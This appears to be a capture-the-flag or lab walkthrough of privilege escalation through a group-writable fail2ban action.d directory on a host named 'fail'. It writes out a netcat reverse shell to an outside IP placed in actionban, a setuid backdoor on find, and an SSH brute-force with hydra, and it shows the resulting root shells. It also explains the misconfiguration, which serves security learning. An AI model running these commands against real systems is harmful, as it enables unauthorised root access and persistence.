4 privesc fail2ban
fox@fail:~$ id
uid=1000(fox) gid=1001(fox) groups=1001(fox),1000(fail2ban)
# Fail2Ban is an IPS framework that protects servers from brute-force attacks. It runs as root and, on a ban, executes the shell commands defined in the matching action.d file — so anyone who can edit those files gets code execution as root.
Using https://grumpygeekwrites.wordpress.com/2021/01/29/privilege-escalation-via-fail2ban/
# log file location; can't read it (root:adm, 0640), so ban events can't be confirmed from the log — only from the side effect of the action firing
fox@fail:~$ ls -la /var/log/fail2ban.log
-rw-r----- 1 root adm 127311 Aug 23 22:31 /var/log/fail2ban.log
fox@fail:~$ ls -la /etc/fail2ban/
[truncated]
drwxrwxr-x 2 root fail2ban 4096 Dec 3 2020 action.d
# /etc/fail2ban/action.d is group-writable by fail2ban, and fox is in that group
# Because fail2ban runs its action commands as root, write access to action.d is effectively root. Normally this directory is root-owned and not group-writable; the group write bit here is the misconfiguration to report/remediate.
fox@fail:/etc/fail2ban/action.d$ ls -la iptables-multiport.conf
-rw-rw-r-- 1 root fail2ban 1420 Jan 18 2018 iptables-multiport.conf
# is writable (root:fail2ban, 0664)
# updating /etc/fail2ban/action.d/iptables-multiport.conf
# Caveat: action.d files are read when a jail starts, so a running fail2ban does not pick this change up until the service is restarted or reloaded — look for a cron job/timer that restarts it, or a way to trigger a reload, before expecting the ban to fire the payload.
actionban = /usr/bin/nc -e /bin/bash 192.168.49.122 9000
            chmod +s /usr/bin/find
# Continuation lines of a multi-line value must be indented or the config is invalid. /usr/bin/nc must be a netcat build that supports -e (the OpenBSD variant does not). The two lines run sequentially, so nc blocks and the chmod only runs once the reverse shell session is closed.
# before
fox@fail:~$ ls -la /usr/bin/find
-rwxr-xr-x 1 root root 315904 Feb 16 2019 /usr/bin/find
# trigger the ban: generate failed SSH logins for fox until the sshd jail's maxretry is hit. The banned IP is the attacking box itself, so start the nc listener before running hydra or the callback is lost.
$ hydra -l fox -P /usr/share/wordlists/rockyou.txt ssh://192.168.122.126 -t 4 -s 22
$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [192.168.49.122] from (UNKNOWN) [192.168.122.126] 36734
whoami;id;hostname
root
uid=0(root) gid=0(root) groups=0(root)
fail
# after
fox@fail:~$ ls -la /usr/bin/find
-rwsr-sr-x 1 root root 315904 Feb 16 2019 /usr/bin/find
# persistence: find is now setuid/setgid root, so a root shell is available without the reverse shell. -p stops sh from dropping the effective uid.
fox@fail:~$ find . -exec /bin/sh -p \; -quit
# whoami
root